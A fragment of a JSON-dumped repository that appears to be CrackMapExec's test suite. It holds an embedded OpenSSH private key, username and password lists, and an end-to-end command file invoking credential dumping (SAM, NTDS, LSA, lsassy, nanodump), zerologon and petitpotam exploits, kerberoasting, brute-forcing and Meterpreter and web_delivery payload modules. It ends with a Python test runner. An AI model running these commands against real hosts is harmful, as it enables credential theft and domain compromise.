KEY-----\n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\n-----END OPENSSH PRIVATE KEY-----\n" }, { "path": "tests/data/test_passwords.txt", "content": "Passw0rd!\nNone\nftp\nguest" }, { "path": "tests/data/test_users.txt", "content": "Administrator\nAnonymous\nftp\nguest" }, { "path": "tests/e2e_commands.txt", "content": "##### SMB\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS # need an extra space after this command due to regex\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --shares\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --shares --filter-shares READ WRITE\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --pass-pol\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --disks\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --groups\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --sessions\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --loggedon-users\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --users\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --computers\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --rid-brute\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --local-groups\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --gen-relay-list /tmp/relaylistOutputFilename.txt\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --local-auth\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --sam\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --ntds\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --lsa\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --dpapi\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -x whoami\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -X whoami\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -X whoami --obfs\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --wmi \"select Name from win32_computersystem\"\n##### SMB Modules\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -L\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M bh_owned\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M dfscoerce\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M drop-sc\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M drop-sc --options\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M drop-sc -o CLEANUP=True\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M empire_exec -o LISTENER=http-listener\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M empire_exec -o LISTENER=http-listener OBFUSCATE=True\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M enum_av\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M enum_dns\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M enum_dns --options\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M enum_dns -o DOMAIN=google.com\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M firefox\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M get_netconnections\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M gpp_autologin\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M gpp_password\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M handlekatz\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M handlekatz --options\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M handlekatz -o HANDLEKATZ_EXE_NAME=\"hk.exe\"\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M hash_spider\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M impersonate\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M install_elevated\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M ioxidresolver\n# currently hanging indefinitely - TODO: look into this\n#crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M keepass_discover\n#crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M keepass_trigger -o ACTION=ALL USER=USERNAME KEEPASS_CONFIG_PATH=\"C:\\\\Users\\\\USERNAME\\\\AppData\\\\Roaming\\\\KeePass\\\\KeePass.config.xml\"\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M lsassy\n# You must replace this with the proper CA information!\n#crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M masky -o CA=\"host.domain.tld\\domain-host-CA\"\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M met_inject -o SRVHOST=127.0.0.1 SRVPORT=4444 RAND=12345\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M ms17-010\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M msol\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M nanodump\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M nopac\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M ntdsutil\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M ntlmv1\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M petitpotam\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M procdump\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdcman\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdp --options\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdp -o ACTION=enable\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdp -o ACTION=disable\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M reg-query -o PATH=HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion KEY=DevicePath\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M runasppl\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M scuffy -o SERVER=127.0.0.1 NAME=test\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M scuffy -o NAME=test CLEANUP=True\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M shadowcoerce\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M slinky -o SERVER=127.0.0.1 NAME=test\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M slinky -o NAME=test CLEANUP=True\n# spider_plus takes a while to run, so it is commented out during normal testing\n# crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M spider_plus -o MAX_FILE_SIZE=100\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M spooler\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M teams_localdb\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M test_connection --options\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M test_connection -o HOST=localhost\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M uac\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M veeam\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M wdigest --options\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M wdigest -o ACTION=enable\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M wdigest -o ACTION=disable\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M web_delivery --options\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M web_delivery -o URL=localhost/dl_cradle\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M webdav\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M webdav --options\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M webdav -o MSG=\"Message: {}\"\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M wifi\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M winscp\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M zerologon\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M spooler -M petitpotam -M zerologon -M nopac -M dfscoerce -M enum_av -M enum_dns -M gpp_autologin -M gpp_password -M lsassy -M impersonate -M install_elevated -M ioxidresolver -M ms17-010 -M ntlmv1 -M runasppl -M shadowcoerce -M uac -M webdav -M wifi\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M bh_owned --options\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M dfscoerce --options\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M empire_exec --options\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M enum_av --options\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M firefox --options\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M get_netconnections --options\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M gpp_autologin --options\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M gpp_password --options\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M hash_spider --options\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M impersonate --options\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M install_elevated --options\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M ioxidresolver --options\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M keepass_discover --options\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M keepass_trigger --options\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M lsassy --options\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M masky --options\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M met_inject --options\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M ms17-010 --options\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M msol --options\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M nanodump --options\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M nopac --options\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M ntdsutil --options\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M ntlmv1 --options\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M petitpotam --options\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M procdump --options\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdcman --options\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M reg-query --options\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M runasppl --options\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M scuffy --options\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M shadowcoerce --options\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M slinky --options\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M spider_plus --options\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M spooler --options\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M teams_localdb --options\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M uac --options\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M veeam --options\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M wifi --options\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M winscp --options\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M zerologon --options\n##### SMB Anonymous Auth\ncrackmapexec smb TARGET_HOST -u '' -p '' -M zerologon\ncrackmapexec smb TARGET_HOST -u '' -p '' -M petitpotam\n##### SMB Auth File\ncrackmapexec smb TARGET_HOST -u data/test_users.txt -p test_passwords.txt --no-bruteforce\ncrackmapexec smb TARGET_HOST -u data/test_users.txt -p test_passwords.txt --no-bruteforce --continue-on-success\ncrackmapexec smb TARGET_HOST -u data/test_users.txt -p test_passwords.txt\n##### LDAP\ncrackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --users\ncrackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --groups\ncrackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --get-sid\ncrackmapexec ldap TARGET_HOST -u USERNAME -p '' --asreproast /tmp/output.txt\ncrackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --kerberoasting /tmp/output2.txt\ncrackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --trusted-for-delegation\ncrackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --admin-count\ncrackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --gmsa\n##### LDAP Modules\ncrackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -L\ncrackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M adcs\ncrackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M adcs --options\ncrackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M daclread -o TARGET=USERNAME ACTION=read\ncrackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M daclread --options\ncrackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M get-desc-users\ncrackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M get-desc-users --options\ncrackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M get-network\ncrackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M get-network --options\ncrackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M groupmembership --options\ncrackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M groupmembership -o USER=USERNAME\ncrackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M laps\ncrackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M laps --options\ncrackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M ldap-checker\ncrackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M ldap-checker --options\ncrackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M maq\ncrackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M maq --options\ncrackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M subnets\ncrackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M subnets --options\ncrackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M user-desc\ncrackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M user-desc --options\ncrackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M whoami\ncrackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M whoami --options\n##### WINRM\ncrackmapexec winrm TARGET_HOST -u USERNAME -p PASSWORD KERBEROS # need an extra space after this command due to regex\ncrackmapexec winrm TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -X whoami\ncrackmapexec winrm TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --laps\ncrackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS\n##### MSSQL\ncrackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS\n##### MSSQL Modules\n# crackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD -M empire_exec\ncrackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -L\ncrackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M met_inject -o SRVHOST=127.0.0.1 SRVPORT=4444 RAND=12345\ncrackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M met_inject --options\ncrackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M mssql_priv\ncrackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M mssql_priv --options\ncrackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M nanodump\ncrackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M nanodump --options\ncrackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M test_connection --options\ncrackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M test_connection -o HOST=localhost\ncrackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M web_delivery --options\ncrackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M web_delivery -o URL=localhost/dl_cradle\n# a bit janky, but we try to enable RDP before testing RDP\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdp -o ACTION=enable\n##### RDP\ncrackmapexec rdp TARGET_HOST -u USERNAME -p PASSWORD KERBEROS # need an extra space after this command due to regex\ncrackmapexec rdp TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --nla-screenshot\n##### SSH - Default test passwords and random key; switch these out if you want correct authentication\ncrackmapexec ssh TARGET_HOST -u USERNAME -p PASSWORD\ncrackmapexec ssh TARGET_HOST -u data/test_users.txt -p test_passwords.txt --no-bruteforce\ncrackmapexec ssh TARGET_HOST -u data/test_users.txt -p test_passwords.txt --no-bruteforce --continue-on-success\ncrackmapexec ssh TARGET_HOST -u data/test_users.txt -p test_passwords.txt\ncrackmapexec ssh TARGET_HOST -u USERNAME -p PASSWORD --key-file data/test_key.priv\ncrackmapexec ssh TARGET_HOST -u USERNAME -p '' --key-file data/test_key.priv\n##### FTP- Default test passwords and random key; switch these out if you want correct authentication\ncrackmapexec ftp TARGET_HOST -u USERNAME -p PASSWORD\ncrackmapexec ftp TARGET_HOST -u USERNAME -p PASSWORD --ls\ncrackmapexec ftp TARGET_HOST -u data/test_users.txt -p test_passwords.txt --no-bruteforce\ncrackmapexec ftp TARGET_HOST -u data/test_users.txt -p test_passwords.txt --no-bruteforce --continue-on-success\ncrackmapexec ftp TARGET_HOST -u data/test_users.txt -p test_passwords.txt" }, { "path": "tests/e2e_test.py", "content": "import argparse\nimport os\nimport subprocess\nfrom rich.console import Console\n\n\ndef get_cli_args():\n parser = argparse.ArgumentParser(description=f\"Script for running end to end tests for CME\")\n parser.add_argument(\"-t\", \"--target\", dest=\"target\", required=True)\n parser.add_argument(\"-u\", \"--user\", \"--username\", dest=\"username\", required=True)\n parser.add_argument(\"-p\", \"--pass\", \"--password\", dest=\"password\", required=True)\n parser.add_argument(\n \"-k\",\n \"--kerberos\",\n action=\"store_true\",\n required=False,\n help=\"Use kerberos authentication\",\n )\n parser.add_argument(\n \"-v\",\n \"--verbose\",\n action=\"store_true\",\n required=False,\n help=\"Display full command output\",\n )\n parser.add_argument(\n \"-e\",\n \"--errors\",\n action=\"store_true\",\n required=False,\n help=\"Display errors from commands\",\n )\n\n parsed_args = parser.parse_args()\n return parsed_args\n\n\ndef generate_commands(args):\n lines = []\n\n if args.kerberos:\n kerberos = \"-k\"\n else:\n kerberos = \"\"\n\n file_loc = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__)))\n commands_file = os.path.join(file_loc, \"e2e_commands.txt\")\n\n with open(commands_file) as file:\n for line in file:\n if line.startswith(\"#\"):\n continue\n line = line.strip()\n line = line.replace(\"TARGET_HOST\", args.target).replace(\"USERNAME\", f'\"{args.username}\"').replace(\"PASSWORD\", f'\"{args.password}\"').replace(\"KERBEROS \", kerberos)\n lines.append(line)\n return lines\n\n\ndef run_e2e_tests(args):\n console = Console()\n tasks = generate_commands(args)\n\n result = subprocess.Popen(\n \"crackmapexec --version\",\n shell=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n )\n version = result.communicate()[0].decode().strip()\n\n with console.status(f\"[bold green] :brain: Running {len(tasks)} test commands for cme v{version}...\") as status:\n passed = 0\n failed = 0\n\n while tasks:\n task = tasks.pop(0)\n result = subprocess.Popen(\n str(task),\n shell=True,\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n )\n # pass in a \"y\" for things that prompt for it (--ndts, etc)\n text = result.communicate(input=b\"y\")[0]\n return_code = result.returncode\n\n if return_code == 0:\n console.log(f\"{task.strip()} :heavy_check_mark:\")\n passed += 1\n else:\n console.log(f\"[bold red]{task.strip()} :cross_mark:[/]\")\n failed += 1\n\n if args.errors:\n raw_text = text.decode(\"utf-8\")\n if \"error\" in raw_text.lower() or \"failure\" in raw_text.lower():\n console.log(f\"[bold red] Error Detected: {raw_text}\")\n\n if args.verbose:\n # this prints sorta janky, but it does its job\n console.log(f\"[*] Results:\\n{text.decode('utf-8')}\")\n console.log(f\"Tests [bold green] Passed: {passed} [bold red] Failed: {failed}\")\n\n\nif __name__ == \"__main__\":\n parsed_args = get_cli_args()\n run_e2e_tests(parsed_args)\n" }, { "path": "tests/test_smb_database.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport pytest\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker, scoped_session\n\nfrom cme.cmedb import delete_workspace, CMEDBMenu\nfrom cme.first_run import first_run_setup\nfrom cme.loaders.protocolloader import ProtocolLoader\nfrom cme.logger import CMEAdapter\nfrom cme.paths import WS_PATH\nfrom sqlalchemy.dialects.sqlite import Insert\n\n\n@pytest.fixture(scope=\"session\")\ndef db_engine():\n db_path = os.path.join(WS_PATH, \"test/smb.db\")\n db_engine = create_engine(f\"sqlite:///{db_path}\", isolation_level=\"AUTOCOMMIT\", future=True)\n yield db_engine\n db_engine.dispose()\n\n\n@pytest.fixture(scope=\"session\")\ndef db_setup(db_engine):\n proto = \"smb\"\n # setup_logger()\n logger = CMEAdapter()\n first_run_setup(logger)\n p_loader = ProtocolLoader()\n protocols = p_loader.get_protocols()\n CMEDBMenu.create_workspace(\"test\", p_loader, protocols)\n\n protocol_db_path = p_loader.get_protocols()[proto][\"dbpath\"]\n protocol_db_object = getattr(p_loader.load_protocol(protocol_db_path), \"database\")\n\n database_obj = protocol_db_object(db_engine)\n database_obj.reflect_tables()\n yield database_obj\n database_obj.shutdown_db()\n delete_workspace(\"test\")\n\n\n@pytest.fixture(scope=\"function\")\ndef db(db_setup):\n yield db_setup\n db_setup.clear_database()\n\n\n@pytest.fixture(scope=\"session\")\ndef sess(db_engine):\n session_factory = sessionmaker(bind=db_engine, expire_on_commit=True)\n Session = scoped_session(session_factory)\n sess = Session()\n yield sess\n sess.close()\n\n\ndef test_add_host(db):\n db.add_host(\n \"127.0.0.1\",\n \"localhost\",\n \"TEST.DEV\",\n \"Windows Testing 2023\",\n False,\n True,\n True,\n True,\n False,\n False,\n )\n 